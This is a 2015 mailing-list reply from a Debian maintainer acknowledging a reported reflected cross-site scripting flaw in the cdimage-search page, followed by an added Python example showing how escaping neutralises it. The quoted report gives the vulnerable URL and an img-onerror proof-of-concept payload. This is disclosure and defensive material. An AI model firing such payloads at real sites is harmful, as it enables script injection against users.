
Re: Critical Vulnerability on your website!



On Thu, Oct 22, 2015 at 02:22:12PM +0000, Othmane Tamagart wrote:
>Hi Debian,
>
>I'm 0thm4n@WhiteHatSec, I am a Based-Student security researcher, Certified Pentester & I did a research, I've found a Very-High Risk Vulnerability called XSS (Cross-site Scripting)
>
>Vulnerable File : http://cdimage-search.debian.org/?search_area=release&type=simple&query=
>
>Vulnerable URL + p0c  : http://cdimage-search.debian.org/?search_area=release&type=simple&query=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%220thm4n%40WhiteHatSecurity%22%29%3B%3E&Search=Search&.cgifields=search_area&.cgifields=type
>
>POST DATA : "><img src=x onerror=prompt("0thm4nWhiteHatSecurity");>
>
>Proof-Of-Concept : http://i.imgur.com/uKtglGC.png
>
>About Vulnerability ( BUG ) : https://en.wikipedia.org/wiki/Cross-site_scripting
>
>Risk : Security Risk Critical

Hi Othmane,

Thanks very much for your report!

I've just pushed a fix to sanitise input here - please let us know if
you find anything further.

-- 
Steve McIntyre, Cambridge, UK.                                steve@einval.com
Google-bait:       http://www.debian.org/CD/free-linux-cd
  Debian does NOT ship free CDs. Please do NOT contact the mailing
  lists asking us to send them to you.
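
An added example, not part of this thread and not the fix that was pushed: it assumes the search form echoed the `query` parameter into an input's `value` attribute, and shows why the reported `">` prefix escapes that attribute and how context-aware output escaping contains it. The form template and the function names are hypothetical.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed query string carrying the payload quoted in the report above.
SAMPLE_QS = ("search_area=release&type=simple&query=%22%3E%3Cimg+src%3Dx+onerror"
             "%3Dprompt%28%220thm4n%40WhiteHatSecurity%22%29%3B%3E&Search=Search")

def render_unsafe(query: str) -> str:
    # "Before" (assumed): the parameter is reflected verbatim into an attribute.
    return f'<form><input type="text" name="query" value="{query}"></form>'

def render_safe(query: str) -> str:
    # "After": escape &, <, > and both quote characters for the attribute context.
    escaped = html.escape(query, quote=True)
    return f'<form><input type="text" name="query" value="{escaped}"></form>'

class TagAudit(HTMLParser):
    """Collects every element and attribute name the parser actually sees."""
    def __init__(self):
        super().__init__()
        self.tags, self.attrs = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)

def audit(markup: str) -> TagAudit:
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser

def injected(markup: str) -> bool:
    # The template only emits <form> and <input>; any other element, or any
    # on* event-handler attribute, must have come from the request.
    seen = audit(markup)
    return (set(seen.tags) - {"form", "input"} != set()
            or any(name.startswith("on") for name in seen.attrs))

def query_from(qs: str) -> str:
    return parse_qs(qs).get("query", [""])[0]

if __name__ == "__main__":
    q = query_from(SAMPLE_QS)
    print("unsafe rendering injected markup:", injected(render_unsafe(q)))
    print("escaped rendering injected markup:", injected(render_safe(q)))
```

The `injected` check doubles as a regression test: run it against the rendered page for a set of known payloads whenever the template changes.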
